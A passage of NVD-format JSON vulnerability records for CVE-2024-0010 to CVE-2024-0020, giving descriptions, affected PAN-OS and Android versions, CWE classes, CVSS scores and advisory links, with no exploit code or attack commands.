"https://security.paloaltonetworks.com/CVE-2024-0010", "name" : "https://security.paloaltonetworks.com/CVE-2024-0010", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.paloaltonetworks.com/CVE-2024-0010", "name" : "https://security.paloaltonetworks.com/CVE-2024-0010", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of a user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.1.0", "versionEndExcluding" : "10.1.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:10.1.11:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.1.0", "versionEndExcluding" : "9.1.17", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.0.0", "versionEndExcluding" : "9.0.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:9.0.17:h3:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:9.0.17:h2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:9.0.17:h1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:9.0.17:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-14T18:15Z", "lastModifiedDate" : "2024-12-09T15:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0011", "ASSIGNER" : "psirt@paloaltonetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.paloaltonetworks.com/CVE-2024-0011", "name" : "https://security.paloaltonetworks.com/CVE-2024-0011", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.paloaltonetworks.com/CVE-2024-0011", "name" : "https://security.paloaltonetworks.com/CVE-2024-0011", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A reflected cross-site scripting (XSS) vulnerability in the Captive Portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of an authenticated Captive Portal user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.1.0", "versionEndExcluding" : "10.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.1.0", "versionEndExcluding" : "9.1.13", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.1.0", "versionEndExcluding" : "8.1.24", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "9.0.0", "versionEndExcluding" : "9.0.17", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.0.0", "versionEndExcluding" : "10.0.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-14T18:15Z", "lastModifiedDate" : "2024-12-09T15:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0012", "ASSIGNER" : "psirt@paloaltonetworks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-306" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/", "name" : "https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://security.paloaltonetworks.com/CVE-2024-0012", "name" : "https://security.paloaltonetworks.com/CVE-2024-0012", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/", "name" : "https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 .\n\nThe risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .\n\nThis issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software.\n\nCloud NGFW and Prisma Access are not impacted by this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.2.0", "versionEndExcluding" : "11.2.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.1.0", "versionEndExcluding" : "11.1.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.0.6:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.0.0", "versionEndExcluding" : "11.0.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:10.2.12:h1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:10.2.12:-:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding" : "10.2.0", "versionEndExcluding" : "10.2.12", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:paloaltonetworks:pan-os:11.1.5:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-18T16:15Z", "lastModifiedDate" : "2024-12-20T15:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0014", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In startInstall of UpdateFetcher.java, there is a possible way to trigger a malicious config update due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2025-03-28T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0015", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70", "name" : "https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70", "name" : "https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T19:15Z", "lastModifiedDate" : "2025-03-14T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0016", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple locations, there is a possible out of bounds read due to a missing bounds check. This could lead to paired device information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2024-12-16T14:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0017", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e", "name" : "https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e", "name" : "https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In shouldUseNoOpLocation of CameraActivity.java, there is a possible confused deputy due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2024-12-16T14:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0018", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23", "name" : "https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23", "name" : "https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In convertYUV420Planar16ToY410 of ColorConverter.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2024-12-16T19:00Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0019", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a", "name" : "https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a", "name" : "https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In setListening of AppOpsControllerImpl.java, there is a possible way to hide the microphone privacy indicator when restarting systemUI due to a missing check for active recordings. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 5.0, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.3, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2025-03-13T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0020", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1", "name" : "https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1", "name" : "https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In onActivityResult of NotificationSoundPreference.java, there is a possible way to hear audio files belonging to a different user due to a confused deputy. This could lead to local information disclosure across users of a device with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2025-03-19T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", 